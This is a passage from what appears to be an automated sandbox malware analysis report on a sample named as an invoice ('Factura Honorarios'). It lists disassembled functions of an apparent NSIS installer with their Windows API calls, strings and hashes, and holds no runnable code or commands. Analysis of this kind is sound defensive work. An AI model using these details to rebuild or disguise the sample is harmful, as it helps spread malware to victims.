                                                                                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58
                                                                                                                                  Function 004052EC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                  • lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                  • lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
                                                                                                                                  • SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2531174081-0
                                                                                                                                  • Opcode ID: 4d71bf0a7f433355d78e1bdcf512e296b69b6d66b67d6526b045d43343bf71c9
                                                                                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                                                                  • Opcode Fuzzy Hash: 4d71bf0a7f433355d78e1bdcf512e296b69b6d66b67d6526b045d43343bf71c9
                                                                                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8
                                                                                                                                  Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                                                                                                                  • GetMessagePos.USER32 ref: 00404BD9
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404BF3
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                  • String ID: f
                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
                                                                                                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                  • Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4
                                                                                                                                  Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                  • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                                                                                  • wsprintfW.USER32 ref: 00402E4C
                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                                                                  Strings
                                                                                                                                  • verifying installer: %d%%, xrefs: 00402E46
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                  • Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
                                                                                                                                  • Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
                                                                                                                                  • Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98
                                                                                                                                  Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                  • API String ID: 2200240437-1946221925
                                                                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98
                                                                                                                                  Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2667972263-0
                                                                                                                                  • Opcode ID: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
                                                                                                                                  • Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
                                                                                                                                  • Opcode Fuzzy Hash: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
                                                                                                                                  • Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98
                                                                                                                                  Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$wsprintf
                                                                                                                                  • String ID: ... %d%%
                                                                                                                                  • API String ID: 551687249-2449383134
                                                                                                                                  • Opcode ID: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                                                                  • Opcode Fuzzy Hash: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
                                                                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9
                                                                                                                                  Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                                                                                                  • wsprintfW.USER32 ref: 00404B52
                                                                                                                                  • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                  • String ID: %u.%u%s%s$6B
                                                                                                                                  • API String ID: 3540041739-3884863406
                                                                                                                                  • Opcode ID: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
                                                                                                                                  • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                                                                                                                  • Opcode Fuzzy Hash: a815db82b42f543a9dd6a4ec2ba834401da5a56b00b51e1f2b8fc7ff7c1c6173
                                                                                                                                  • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                                                                                                                  Function 00406518 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                                                                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                                                                                                  • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                                                                                                  • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,75573420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                  • Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
                                                                                                                                  • Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
                                                                                                                                  • Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD
                                                                                                                                  Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017B0
                                                                                                                                  • CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,00000031), ref: 004017D5
                                                                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
                                                                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1941528284-0
                                                                                                                                  • Opcode ID: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                                                                  • Opcode Fuzzy Hash: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
                                                                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E
                                                                                                                                  Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(?), ref: 00401DBC
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                                  • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3808545654-0
                                                                                                                                  • Opcode ID: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                  • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                                                                                                                  • Opcode Fuzzy Hash: 2e8c6812557a8000d290618689d5c167272f7de43d41522ca2a47e16c60e8740
                                                                                                                                  • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                                                                  Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                  • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                                  • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                                                                                  • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                                                                                  • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                                                                                  Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                                  • String ID: !
                                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                                  • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                                                                                  • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                                                                                  • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                                                                                  Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$Enum
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                  • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                                                                                                                  • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                  • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                                                                                                                  Function 004057BB Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 004057FE
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657157022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2657137036.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657173736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657189932.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2657213648.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
